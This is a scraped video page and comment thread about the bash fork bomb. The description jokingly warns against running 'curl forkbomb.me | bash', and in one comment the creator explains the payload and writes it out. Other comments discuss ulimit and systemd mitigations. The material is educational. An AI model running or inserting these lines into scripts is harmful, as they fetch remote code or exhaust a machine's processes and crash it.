this one-liner will crash your system

Поділитися
Вставка
  • Опубліковано 20 вер 2024
  • Do not 'curl forkbomb.me | bash' :-)

КОМЕНТАРІ • 17

  • @Dan-vu3vt
    @Dan-vu3vt 3 місяці тому +14

    Making that function more readable is an awesome way of teaching what it does.

  • @boas_
    @boas_ 3 місяці тому +8

    So basically a nuclear bomb

  • @matthewperiut7508
    @matthewperiut7508 3 місяці тому +3

    Tested it on my macbook which is bsd based, and surprisingly there was a level of protection, so it didn't crash my system interestingly enough! Great video!

  • @keshamix_
    @keshamix_ 3 місяці тому +1

    Greta video, honestly. Well-spoken, confident, nice editing. Wish you look at growing big

  • @olifloof
    @olifloof 3 місяці тому +5

    iirc most distros using systemd mitigate forkbombs by setting a ulimit

    • @MalwareCube
      @MalwareCube  3 місяці тому +1

      Yep, you can set limits on systemd unit files, and you can also set a ulimit to a smaller value in login scripts.

  • @Markadown
    @Markadown 3 місяці тому +1

    This was pretty cool.

  • @NoNoandNo-no
    @NoNoandNo-no 6 днів тому

    Hi Andrew, I wanted to ask this during the Cyber Mentor live session, but I missed the notification, unfortunately. Do I need to learn Python and scripting for a SOC analyst role? If so, where should I start?

    • @MalwareCube
      @MalwareCube  6 днів тому

      @NoNoandNo-no yeah it can be useful as you progress in the SOC or move into more engineering roles. I wouldn't put it as a requirement as an entry level analyst (meaning I think there are other areas that should take priority first) but you'll sometimes see it as a "nice to have " on job postings. I can only suggest TCM's python course as personally I haven't taken any others to compare, but I thought it was a great foundation.

  • @li-lunarink
    @li-lunarink 3 місяці тому +4

    why no comments man

  • @nikhils7583
    @nikhils7583 3 місяці тому +1

    This was nice.😅

  • @W0lfCL
    @W0lfCL 3 місяці тому

    I don't get why there's a pipilne there. Like I always thought that command1 | command2 redirects the output of the command1 to the input of the command2
    Why is it :|: and not something like :&&: ???

    • @MalwareCube
      @MalwareCube  3 місяці тому +3

      Great question, and you're correct about the pipe. In this case, the actual data or output being passed through the pipe is not used. If a process takes nothing into stdin, you can still pipe to it. Using && would make the second call dependent on the successful completion of the first call, and so the pipe is used to execute both recursive calls in parallel without conditions. To your point, ":(){ :&:; }; :" will also work in most cases.

    • @W0lfCL
      @W0lfCL 3 місяці тому +1

      @@MalwareCube thx for making this clear

  • @ZaynorMC
    @ZaynorMC 3 місяці тому +3

    Why make it so unnecessarily complex? Just keep it simple and run "make -j"

  • @JarppaGuru
    @JarppaGuru 3 місяці тому

    one liner admin is better